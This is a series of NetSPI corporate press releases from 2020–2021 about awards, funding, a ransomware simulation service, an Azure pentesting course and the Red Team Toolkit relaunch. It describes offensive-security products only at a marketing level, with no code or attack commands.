(Post title: NetSPI named a Minne Inno Blazer Award winner; https://www.netspi.com/?p=26129)

Published 2021-07-14
Celebrating the 35th class of unstoppable entrepreneurs who transform the Heartland Region and beyond.

Minneapolis, Minnesota  –  Ernst & Young LLP (EY US) announced that NetSPI CEO and President Aaron Shilts was named an Entrepreneur Of The Year® 2021 Heartland Award finalist. Now in its 35th year, the Entrepreneur Of The Year program honors unstoppable business leaders whose ambition, ingenuity and courage in the face of adversity help catapult us from the now to next and beyond. 

Shilts was selected by a panel of independent judges. Award winners will be announced during a special virtual celebration on Tuesday, July 27, 2021, becoming lifetime members of an esteemed community of Entrepreneur Of The Year alumni from around the world.

Entrepreneur Of The Year is one of the preeminent competitive award programs for entrepreneurs and leaders of high-growth companies. The nominees are evaluated based on six criteria: entrepreneurial leadership; talent management; degree of difficulty; financial performance; societal impact and building a values-based company; and originality, innovation, and future plans. Since its launch, the program has expanded to recognize business leaders in more than 145 cities in over 60 countries around the world.

“This recognition validates the incredible work our team is doing,” said Shilts. “NetSPI team members operate as entrepreneurs every day and it’s an honor to help lead and support some of the most brilliant people in cybersecurity.”

Regional award winners are eligible for consideration for the Entrepreneur Of The Year National Awards, to be announced in November 2021 at the Strategic Growth Forum®, one of the nation’s most prestigious gatherings of high-growth, market-leading companies. The Entrepreneur Of The Year National Overall Award winner will then move on to compete for the EY World Entrepreneur Of The Year™ Award in June 2022.

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

Sponsors

Founded and produced by Ernst & Young LLP, the Entrepreneur Of The Year Awards are nationally sponsored by SAP America and The Kauffman Foundation. In the Heartland Region sponsors also include Colliers International, Padilla, PNC Bank, SALO, LLC, and Twin Cities Business.

About Entrepreneur Of The Year®

Entrepreneur Of The Year® is the world’s most prestigious business awards program for unstoppable entrepreneurs. These visionary leaders deliver innovation, growth and prosperity that transform our world. The program engages entrepreneurs with insights and experiences that foster growth. It connects them with their peers to strengthen entrepreneurship around the world. Entrepreneur Of The Year is the first and only truly global awards program of its kind. It celebrates entrepreneurs through regional and national awards programs in more than 145 cities in over 60 countries. National Overall winners go on to compete for the EY World Entrepreneur Of The Year™ title. Visit ey.com/us/eoy

About EY Private

As Advisors to the ambitious™, EY Private professionals possess the experience and passion to support private businesses and their owners in unlocking the full potential of their ambitions. EY Private teams offer distinct insights born from the long EY history of working with business owners and entrepreneurs. These teams support the full spectrum of private enterprises including private capital managers and investors and the portfolio businesses they fund, business owners, family businesses, family offices and entrepreneurs. Visit ey.com/us/private

About EY

EY exists to build a better working world, helping create long-term value for clients, people and society and build trust in the capital markets. 

Enabled by data and technology, diverse EY teams in over 150 countries provide trust through assurance and help clients grow, transform, and operate.

Working across assurance, consulting, law, strategy, tax, and transactions, EY teams ask better questions to find new answers for the complex issues facing our world today.

EY refers to the global organization, and may refer to one or more of the member firms, of Ernst & Young Global Limited, each of which is a separate legal entity. Ernst & Young Global Limited, a UK company limited by guarantee, does not provide services to clients. Information about how EY collects and uses personal data and a description of the rights individuals have under data protection legislation are available via ey.com/privacy. EY member firms do not practice law where prohibited by local laws. For more information about our organization, please visit ey.com.

Contact:
Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277

Post title: EY US Announces NetSPI CEO Aaron Shilts as an Entrepreneur Of The Year 2021® Heartland Award Finalist
Post excerpt: The award celebrates unstoppable entrepreneurs who transform the Heartland Region and beyond.
Post URL: https://www.netspi.com/?p=25909

Next post, published 2021-07-08:

Las Vegas, Nevada  –  NetSPI, the leader in enterprise penetration testing and attack surface management, is attending Black Hat USA 2021 at the Mandalay Bay Convention Center in Las Vegas. This year, the hybrid event will be held in-person and online, featuring cybersecurity trainings, expert-led briefings, networking opportunities, and more. During the conference, the NetSPI team will feature its ransomware attack simulation service and will unveil new, innovative features added to its penetration testing and vulnerability management platform, Resolve™. Connect with NetSPI’s penetration testing and ransomware experts at the Black Hat Business Hall (in-person or virtually) at booth #1579.

To learn more, visit the Black Hat USA website.

Who:

Jake Reynolds, Head of Product at NetSPI
Scott Sutherland, Practice Director at NetSPI

What:

Black Hat Business Hall (In-Person and Virtual)
Meet the NetSPI team at booth #1579 to learn more about their expertise in enterprise penetration testing and attack surface management. Get a first look and demo of NetSPI’s new risk scoring feature and learn more about its ransomware attack simulation service. Bonus: Visit the in-person or virtual NetSPI booths for a chance to win a 128 GB Oculus Quest VR headset.

CANCELED: NetSPI Happy Hour at the Mandalay Bay Foundation Room
NetSPI’s August 4 happy hour during Black Hat at the Mandalay Bay Foundation Room has been canceled to limit the spread of the COVID-19 Delta variant, following the latest CDC guidance. The ransomware session will now be available as a webinar on August 17. Register here: How to Build and Validate Ransomware Attack Detections

When:

Black Hat In-Person: 
August 4, 2021 | 10am – 6pm PT
August 5, 2021 | 10am – 4pm PT

Black Hat Virtual: 
August 4, 2021 | 8:30am – 5pm PT
August 5, 2021 | 8:30am – 4pm PT

Where:

Black Hat In-Person Business Hall: 
Booth #1579
Mandalay Bay Convention Center
Las Vegas, NV

Black Hat Virtual Business Hall: 
Booth #1579

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

About Black Hat

Founded in 1997, Black Hat is an internationally recognized cybersecurity event series providing the most technical and relevant information security research. Grown from a single annual conference to the most respected information security event series internationally, these multi-day events provide the security community with the latest cutting-edge research, developments, and trends.

Press Contact:
Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277

Post title: NetSPI to Highlight Ransomware Resiliency, Risk-Based Vulnerability Management, and Penetration Testing as a Service During Black Hat 2021
Post excerpt: NetSPI attends Black Hat 2021 with a focus on ransomware, vulnerability management, and penetration testing as a service.
Post URL: https://www.netspi.com/?p=25827

Next post, published 2021-06-18:

On June 18, 2021, NetSPI was recognized as a 2021 Fire Award winner.

The Fire Awards are always meant to be a celebration of the companies and people that keep Minnesota's tech and startup scene alive.

With this year's fourth annual Fire Awards, we want to celebrate even harder than ever before after one of the most trying years in memory. That's why we have the biggest Fire Awards ever, honoring 50 companies from across the state.

We sourced these Fire winners from our readers and added some companies that have made waves in the past year or are on the precipice of big things. Many companies were honored because of the steps they took to help tackle the Covid-19 pandemic.

In July, a Blazer winner will be selected from each category by a panel of judges. Blazer winners are the hottest companies in each category, deserving some extra recognition. More details about that event will come out later this month.

We've honored companies in a variety of categories. Startup of the Year is the startup that has risen above the rest in the past year, while the Growing Companies category is for those companies that are a bit smaller but show the potential to be a Startup of the Year down the road. We're also honoring the organizations that support our ecosystem with the community builder category, as well as a few specific industries like medical devices and health and wellness.

Let's meet our Fire winners!

High Tech Company:

NetSPI is a Minneapolis-based cybersecurity company that specializes in penetration testing, which is sometimes called ethical hacking. In May, it raised $90 million in venture capital. Its clients include Fortune 500 companies like Medtronic and Microsoft.

Digi-Key is an electronics distributor and one of Minnesota's largest private companies. The Thief River Falls-based company helped the University of Minnesota produce the Coventor, a jerry-rigged ventilator that helped address ventilator shortages during the Covid-19 pandemic.

Arctic Wolf is a transplanted unicorn cybersecurity company. Founded in Silicon Valley, it moved to Eden Prairie in 2020 at the same time it announced a $200 million round of venture capital funding at a valuation of over $1 billion.

Lucy, also known as Equals3, is a Minneapolis-based AI firm that helps Fortune 500 clients manage their data. It raised $3 million in June and plans to double its employee base to over 50 by the end of the year.

Carrot Health is a Minneapolis-based firm that collects consumer data for health plans to help them address what are known as the social determinants of health, or environmental factors that affect people's health. It has been experiencing 100% growth since it was founded.

Read the full article here: https://www.bizjournals.com/twincities/inno/stories/inno-on-fire/2021/06/18/meet-minne-innos-2021.html

Post title: Minne Inno announces the 2021 Fire Awards
Post excerpt: On June 18, 2021, NetSPI was recognized as a 2021 Fire Award winner.
Post URL: https://www.netspi.com/?p=25619

Next post, published 2021-06-17:
Through the tech-enabled service, organizations can put their ransomware prevention and detection capabilities to the test.

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, today announced its new ransomware attack simulation service. In collaboration with its ransomware security experts, the new service enables organizations to emulate real world ransomware families to find and fix critical vulnerabilities in their cybersecurity defenses.

Recent ransomware attacks have exposed major cybersecurity gaps globally. In the U.S., the Biden administration is urging business leaders to take immediate steps to prepare for ransomware attacks. In a recent memo, deputy national security advisor for cyber and emerging technology Anne Neuberger recommends organizations, “use a third-party pentester to test the security of your systems and your ability to defend against a sophisticated [ransomware] attack.”

“Paying a ransom doesn’t guarantee your data is returned safely, yet, one in four companies worldwide pay the adversaries [I],” said Scott Sutherland, Practice Director at NetSPI. “Organizations must get more proactive with their security efforts to avoid paying the ransom and funding the cybercriminals. Ransomware families are both opportunistic and targeted – and no industry is exempt from falling victim to an attack.”

“NetSPI is eager to help organizations achieve a more scalable and continuous assessment of their environment from the perspective of an adversary,” said Charles Horton, COO at NetSPI. “The addition of the ransomware attack simulation service to our adversary simulation solutions will further help organizations strengthen their defenses and become more resilient against ransomware attacks.”

During a ransomware attack simulation engagement, NetSPI closely collaborates with organizations to simulate sophisticated ransomware tactics, techniques, and procedures (TTPs) using its custom-built breach and attack simulation technology. Following each engagement, organizations gain access to NetSPI’s technology to run custom plays on their own and continuously evaluate how well their cybersecurity program will hold up to a ransomware attack.

Learn more about NetSPI’s ransomware attack simulation online here and download The Ultimate Guide to Ransomware Attacks for insights on how to prevent and respond to a ransomware attack.

The Ultimate Guide to Ransomware Attacks – Download Now

[I] SonicWall 2021 Cyber Threat Report; https://www.sonicwall.com/2021-cyber-threat-report/

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ platform and adversary simulation through its Red Team Toolkit. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

Contact:
Tori Norris
Marketing Manager, NetSPI
victoria.norris@netspi.com
(630) 258-0277

Post title: Improve Ransomware Attack Resiliency with NetSPI’s New Ransomware Attack Simulation
Post excerpt: Learn how NetSPI's new ransomware attack simulation service enables organizations to find and fix critical vulnerabilities in their ransomware defenses.
Post URL: https://www.netspi.com/?p=25599

Next post, published 2021-06-16:

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, has been named one of the Top Workplaces in Minnesota by the Star Tribune. Top Workplaces recognizes the most progressive companies in Minnesota based on employee opinions measuring engagement, organizational health, and satisfaction. 

“NetSPI wouldn’t be what it is today without its employees and the culture of innovation that we’ve built,” said NetSPI President and CEO Aaron Shilts. “Even during a turbulent 2020, we had an employee retention rate of 92% which alone speaks volumes in an industry that has zero percent unemployment. I thank each and every member of our team for helping to make NetSPI a Top Workplace.”

The results of the Star Tribune Top Workplaces are based on survey information collected by Energage, an independent company specializing in employee engagement and retention. The analysis includes responses from over 76,000 employees at Minnesota public, private and nonprofit organizations. 

NetSPI is hiring—apply today!

“We are especially proud of the fact that our employees called out NetSPI’s top strengths as interdepartmental cooperation, execution, and innovation. This award shows how well our teams work together, which is a key to our success,” said NetSPI Director of People Operations Heather Neumeister. “Seeing the variety of responses throughout the survey really validates the culture we have at NetSPI. Working with great people, doing important work, and having fun came through in many of the comments provided.”

This Top Workplace recognition follows an especially successful 12 months for NetSPI. Recently, NetSPI announced it raised $90 million in growth funding led by KKR, with participation from Ten Eleven Ventures. In 2020, NetSPI acquired Silent Break Security and incorporated its proprietary Adversary Simulation and Red Team Toolkit software into the company’s offensive cyber security and attack surface management offerings. NetSPI also launched Penetration Testing as a Service (PTaaS) in 2020, powered by its Resolve™ platform. 2021 also promises more business opportunities for NetSPI with upcoming additions of risk scoring, vulnerability intelligence, ransomware attack simulation, and more.

To qualify for the Star Tribune Top Workplaces, a company must have more than 50 employees in Minnesota. Nearly 3,000 companies were invited to participate. Rankings were composite scores calculated purely on the basis of employee responses.

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ platform and adversary simulation through its Red Team Tool Kit. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

Media Contacts:
Elyse Bauchle, Maccabee PR for NetSPI
elyse@maccabee.com
(612) 294-3125

Tori Norris
Marketing Manager, NetSPI
victoria.norris@netspi.com
(630) 258-0277

Post title: NetSPI Named a 2021 Top Workplace in Minnesota
Post excerpt: Learn why NetSPI was named a 2021 top workplace in Minnesota by the Star Tribune.
Post URL: https://www.netspi.com/?p=25593

Next post, published 2021-06-10:
The new training course provides a deep dive on the attack surface introduced by Azure and how to exploit its vulnerabilities.

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, today announced Dark Side Ops (DSO) 3: Azure Cloud Pentesting, a new cybersecurity training course focused on Azure cloud penetration testing. Participants will gain a better understanding of potential risks associated with Azure cloud deployments, how to exploit them, and how to prevent and remediate critical cloud vulnerabilities.

As experts anticipate [I] cloud adoption to soar in the aftermath of the COVID-19 pandemic, this course helps cybersecurity, DevOps, and IT professionals better grasp the complexities that accompany Microsoft’s Azure cloud platform. The first public DSO 3: Azure Cloud Pentesting training is scheduled for August 23-24, 2021 and will be conducted virtually. The two-day training session costs $2,000/person.

“It’s no surprise that cloud security was listed as the most important skill needed to pursue a cybersecurity career in the latest (ISC)² Cybersecurity Workforce Study [II],” said Aaron Shilts, President and CEO at NetSPI. “An emphasis on cloud security education and training is critical as the attack surface grows.”

“Not only does DSO 3: Azure Cloud Pentesting feature a live cloud environment and real-world examples from our extensive cloud penetration testing work, it is also designed and instructed by NetSPI practice director Karl Fosaaen, one of the foremost experts on Azure penetration testing,” Shilts added.

“Traditional network penetration testing processes need to be updated to account for the intricacies introduced by cloud infrastructure,” said Karl Fosaaen, Cloud Practice Director at NetSPI. “Through the training, I’m eager to teach others how to level up their on-premise penetration testing skills and apply them to Azure cloud.”

NetSPI’s Dark Side Ops trainings, DSO 1: Malware Dev, DSO 2: Adversary Simulation, and DSO 3: Azure Cloud Pentesting, are available as private trainings, upon request. Contact NetSPI for more information regarding private group training sessions.

For additional training details and course requirements, visit the NetSPI website. Registration is now open for all August 2021 DSO cybersecurity training courses.

Dark Side Ops 3: Azure Cloud Pentesting virtual course on August 23–24, 2021 (9AM to 5PM CT)

[I] Gartner Newsroom; November 17, 2020; https://www.gartner.com/en/newsroom/press-releases/2020-11-17-gartner-forecasts-worldwide-public-cloud-end-user-spending-to-grow-18-percent-in-2021
[II] (ISC)² Cybersecurity Workforce Study 2020; https://www.isc2.org/Research/Workforce-Study

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ platform and adversary simulation through its Red Team Toolkit. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

Contact:
Tori Norris
Marketing Manager, NetSPI
victoria.norris@netspi.com
(630) 258-0277

Post title: Azure Cloud Pentesting Added to NetSPI’s Roster of Cybersecurity Training Courses
Post excerpt: Learn how to exploit, prevent, and remediate critical Azure cloud vulnerabilities.
Post URL: https://www.netspi.com/?p=25552

Next post, published 2021-05-12:
Investment to Fuel Innovation and Growth, Including Global Expansion and Product Innovation

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, today announced it has raised $90 million in growth funding led by KKR, with participation from Ten Eleven Ventures. The investment will be used to further accelerate NetSPI’s rapid growth by expanding the company’s cyber security and client experience teams, investing in product innovation, and deepening operations across U.S. and international markets.

“The reality is that cyber security attacks today are inevitable and put organizations at grave risk,” said NetSPI President and Chief Executive Officer Aaron Shilts. “At NetSPI, we strive to stay one step ahead of hackers, breaches, and bad actors by focusing on prevention-based security techniques. Rooted in the founding tenets of the company, our goals are purposely aggressive to help our clients adapt to the constantly evolving threat landscape.”

Since its founding, NetSPI has focused its services to help companies proactively defend themselves from cyberattacks through a robust and innovative technology platform, allowing NetSPI’s team of experts to thoroughly identify security vulnerabilities. At a time when cyber security spending is expected to exceed $200 billion per year by 2024, according to a recent Bloomberg Intelligence (BI) report, more companies are preparing to fend off sophisticated cyber-attacks and avoid reputational and business risks.

“Our clients rely on us to help secure their ever-evolving attack surface by leveraging our expertise in cloud, red team, application, and network security,” continued Shilts. “This investment from KKR and Ten Eleven Ventures allows NetSPI to better meet this demand while simultaneously fueling growth and innovation as a leader in the booming cyber security market. With our investors’ support, NetSPI will continue to transform the industry with a focus on attack surface management, enterprise security testing, and vulnerability management.”

“NetSPI has built a differentiated suite of tech-enabled services and test orchestration and reporting software that is not only enhancing cyber security for complex global enterprises across a wide range of industries, but is simultaneously disrupting the traditional penetration testing market in order for these enterprises to continuously test their applications, networks, and cloud infrastructures at scale,” said Ben Pederson, Principal at KKR. “We are excited to invest in NetSPI’s growth as they build and deliver these critically important offensive security solutions.”

Jake Heller, Head of KKR’s Technology Growth team in the Americas, added: “Aaron and his team have a deep appreciation for the needs of their customers and the increasing demand for best-in-class, tech-enabled cyber security systems.”

KKR is investing in NetSPI through its Next Generation Technology Growth Fund II. KKR and Ten Eleven Ventures have invested in market-leading cyber security companies including Darktrace, KnowBe4, Ping Identity, Cylance, ForgeRock, and ReliaQuest.

“Penetration testing is a critical component of any enterprise’s security program and will continue to be an important part of compliance and regulatory requirements in the future,” said Mark Hatfield, General Partner, Ten Eleven Ventures. “With its deep expertise and automated platform, NetSPI has developed an incredibly effective and efficient approach to penetration testing and attack surface management. We’re thrilled to partner with this exceptional team and look forward to drawing on our cyber security expertise to help NetSPI bring its technology to more companies across the globe.”

After spending its first several years as a bootstrapped, profitable business, in 2017 NetSPI partnered with Sunstone Partners, who has been instrumental to the company’s growth post-investment. Gus Alberelli, Managing Director of Sunstone Partners, said: “We’re incredibly fortunate to partner with NetSPI’s team and proud of the company’s extraordinary growth stemming from its technology-enabled penetration testing team. We are excited for KKR and Ten Eleven Ventures to join Sunstone Partners in supporting NetSPI’s growth journey.”

The investment is the latest transaction in a period of accelerated growth for NetSPI. Most recently, NetSPI acquired Silent Break Security and incorporated its proprietary Adversary Simulation and Red Team Toolkit software into the company’s offensive cyber security and attack surface management offerings. In 2020, NetSPI launched Penetration Testing as a Service (PTaaS) powered by its Resolve™ platform. Upcoming additions of risk scoring, vulnerability intelligence, breach and attack simulation, and more will continue to differentiate NetSPI's technology offerings.

Goodwin Procter LLP advised NetSPI on the transaction and Latham & Watkins LLP advised KKR and Ten Eleven Ventures.

Video: https://vimeo.com/547974617

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ platform and adversary simulation through its Red Team Tool Kit. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

About KKR

KKR is a leading global investment firm that offers alternative asset management and capital markets and insurance solutions. KKR aims to generate attractive investment returns by following a patient and disciplined investment approach, employing world-class people, and supporting growth in its portfolio companies and communities. KKR sponsors investment funds that invest in private equity, credit and real assets and has strategic partners that manage hedge funds. KKR’s insurance subsidiaries offer retirement, life, and reinsurance products under the management of The Global Atlantic Financial Group. References to KKR’s investments may include the activities of its sponsored funds and insurance subsidiaries. For additional information about KKR & Co. Inc. (NYSE: KKR), please visit KKR’s website at www.kkr.com and on Twitter @KKR_Co.

About Ten Eleven Ventures

Ten Eleven Ventures is the original venture capital firm focused solely on investing in digital security. The firm invests globally and at all stages, from seed to growth (the latter via its Joint Investment Alliance with KKR). Since its founding in Silicon Valley in 2015, Ten Eleven Ventures has raised nearly $US 500 million and invested in 30 leading cybersecurity companies including KnowBe4, Darktrace, Twistlock, Verodin, Cylance, and Ping Identity. For more information, please visit www.1011vc.com or follow us on Twitter @1011vc.

About Sunstone Partners

Sunstone Partners is a growth-oriented private equity firm that makes majority and minority investments in technology-enabled services and software businesses. Recently recognized as one of Inc.’s 2020 PE 50 founder-friendly private equity firms for entrepreneurs, the firm seeks to partner with exceptional management teams, often as their first institutional capital partner, to help accelerate organic growth and fund acquisitions. Founded in 2015, the firm has $800 million of committed capital to its first two funds. For more information, visit www.sunstonepartners.com.

Media Contacts:
Jean Hill, Maccabee PR for NetSPI
jean@maccabee.com
(612) 294-3154

KKR
Cara Major or Miles Radcliffe-Trenner
Media@KKR.com
(212) 750-8300

Ten Eleven Ventures
Megan Dubofsky
mdubofsky@1011vc.com
(917) 576-5590

Post title: Cyber Security Penetration Testing Leader NetSPI Secures $90 Million in Growth Funding Led by KKR

Published: 2021-05-12

On May 12, 2021, NetSPI announced new funding from KKR and Ten Eleven. Learn why Ten Eleven chose to invest in NetSPI:

Today we’re pleased to announce our investment in NetSPI. In cybersecurity, understanding where weaknesses lie is a critical first step in defense. One crucial way to assess this is through penetration testing, where “ethical hackers” attempt to break into your systems before attackers can. Penetration testing is often required of technology vendors by their customers and a mandated part of certain required compliance programs and certifications, including SOC 2. Because of its importance, pen testing represents a $1.7Bn market growing at 22% a year – but companies are always looking for a way to do it in a faster and easier manner.

Read more here: https://www.1011vc.com/news/why-we-invested-in-netspi/

Post title: Ten Eleven: Why We Invested in NetSPI

Published: 2021-02-09

NetSPI’s toolkit for covert adversary simulations is now available to enterprise red teams with new features and functionality.

Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, today relaunched Red Team Toolkit, a sophisticated suite of penetration testing and adversary simulation tools. NetSPI integrated and advanced the Toolkit after the acquisition of Silent Break Security in late 2020. It features a re-designed web-based user experience and improved functionality that supports more advanced and collaborative red team operations.

“We designed the all-new Red Team Toolkit Platform to better emulate sophisticated, real-world attackers after observing critical gaps left by other well-signatured tools on the market,” said Brady Bloxham, Chief Technology Officer at NetSPI. “We continue to use the platform on our own red team operations and are constantly updating it with the latest offensive techniques and defensive countermeasures. It is the most capable offensive toolkit available to red teams today.”

Red Team Toolkit’s tooling and features include:

  • Slingshot: Slingshot is a Windows post-exploitation agent used by red teams to conduct advanced network cyber-operations. Designed with stealth in mind, it enables operators to accurately emulate sophisticated adversaries. It increases the speed and efficiency of advanced operations through malleable network profiles, direct syscall execution, memory obfuscation, blended HTML traffic, scripting automation interface, and more.
  • Improved user experience: Its new web-based user interface was built with the operator experience and productivity top of mind. It is a command and control (C2) server, providing a unified interface for all current and future tools.
  • Multi-user support: The all-new Red Team Toolkit Platform supports multi-user interaction with tiered access permissions. This provides mirrored output, improved team collaboration, seamless operations, and training opportunities.
  • Keyboard-centric controls: Inspired by a traditional terminal, red teamers will feel at home with keyboard-centric controls and an integrated command palette.
  • Functional storage: Connect Red Team Toolkit to your existing database infrastructure or a simple SQLite file. Everything is well-formed, easily parsed, and recorded in one central location.

“Our teams think like adversaries and perform red teaming for some of the most advanced organizations in the world,” said Aaron Shilts, President and CEO of NetSPI. “We take pride in building technology that changes how our clients think about their penetration testing programs and the industry as a whole - and we are thrilled to make it available to others with the reintroduction of Red Team Toolkit.”

Learn more about how Red Team Toolkit can optimize your Red Team engagements and increase productivity. Contact sales@netspi.com.

Video: https://youtu.be/zAFdEiGFQC4

About NetSPI

NetSPI is the leader in enterprise penetration testing and attack surface management. We are proud to partner with nine of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track, and fix their vulnerabilities faster. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of growth equity firm Sunstone Partners. Follow us on Facebook, Twitter, and LinkedIn.

Media Contacts:
Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277

Jean Hill, Maccabee PR for NetSPI
jean@maccabee.com
(612) 294-3154

Post title: NetSPI Relaunches Red Team Toolkit

Published: 2021-01-26

Following a successful year, NetSPI promotes Aaron Shilts to CEO while co-founder Deke George assumes a new role on the Board of Directors.
Minneapolis, Minnesota – NetSPI, the leader in enterprise security testing and vulnerability management, achieved 35% organic revenue growth in fiscal year 2020, added over 150 new clients, and expanded its team to more than 200 employees. NetSPI’s Penetration Testing as a Service (PTaaS) delivery model, core service expansion, and Silent Break Security acquisition all contributed to its strong growth. Since 2017, NetSPI has tripled its topline revenue while remaining profitable.

As NetSPI looks forward to 2021, the company has promoted Aaron Shilts to President and CEO and Charles Horton to COO. NetSPI co-founder Deke George will assume a new role as Chairman on the Board of Directors and remain actively involved in the company.

“2020 was full of challenges, not only for our team, but also for our clients. I’m proud of the rapid growth this team has achieved and how we’ve adapted and scaled to support our clients at a time when people and organizations are more vulnerable,” said Shilts. “More businesses recognize the foundational importance of secure software. As such, I anticipate that NetSPI’s core business in application security, vulnerability management, and cloud testing will experience even higher demand in 2021.”

Achievements that contributed to NetSPI’s 2020 success include:

  • Penetration Testing as a Service (PTaaS) Powered by Resolve™: PTaaS enables customers to simplify the scoping of new engagements, view their testing results in real-time, orchestrate faster remediation, perform always-on continuous testing, and more – all through the Resolve vulnerability management and orchestration platform.
  • Cloud Security Testing Expansion: NetSPI expanded its industry-leading cloud penetration testing services to include the AWS, Azure, Google, and Oracle cloud environments, for both point-in-time and continuous testing.
  • Strategic Advisory Services: This new consulting service builds and improves application security programs. The core functions of Strategic Advisory Services include program benchmarking, roadmap development, and security metrics.
  • Static Application Security Testing (SAST) and Secure Code Review (SCR): NetSPI enhanced its SAST and SCR services to help development teams establish a more strategic approach to building secure applications and identifying vulnerabilities earlier in the software development lifecycle (SDLC).
  • Silent Break Security Acquisition: NetSPI acquired Silent Break Security to complete its offensive cybersecurity and attack surface management offerings. Silent Break Security’s manual testing team, proprietary Adversary Simulation and Red Team Toolkit software, and enterprise clients improve NetSPI’s ability to scale up vulnerability management programs to meet client needs.
  • NetSPI Thought Leadership: In 2020, NetSPI spotlighted its roster of technology and management experts, creating a breadth of thought leadership content across several platforms including the executive and technical blogs, webinars, downloadable resources, and the Agent of Influence podcast.
  • Philanthropic Activities: NetSPI became a sponsor for Change Starts With Me, a grassroots movement working to rebuild communities impacted by social, health, and economic crises. The company also continues to work closely with the University of Minnesota Masonic Children’s Hospital and raised funds to support World Central Kitchen, MasksOn.org, and Northside Funders Group.
“Technology innovation is what we do best. It’s the foundation on which we built NetSPI,” said Deke George. “This was evident over the past 12 months, and I believe NetSPI is leading a revolutionary shift in the way penetration testing and vulnerability management is performed.”

“We come into the new year with incredible momentum and continued focus on delivering an exceptional client experience,” Shilts said. “In 2021 we will extend the intelligence and automation features of our Resolve platform. With data from over 80 million vulnerabilities, we give our customers access to the most robust risk scoring system on the market, the power to predict the likelihood of vulnerabilities in their environment, and the ability to automatically run adversary simulations across their entire attack surface.”

Join NetSPI’s mailing list to be the first to receive company, product, and services updates. Sign up here.

About NetSPI

NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with nine of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track, and fix their vulnerabilities faster. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of growth equity firm Sunstone Partners. Follow us on Facebook, Twitter, and LinkedIn.

Media Contacts:
Jean Hill, Maccabee PR for NetSPI
jean@maccabee.com
(612) 294-3154

Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277

Post title: NetSPI Celebrates 35% Organic Revenue Growth in 2020

Published: 2020-12-15

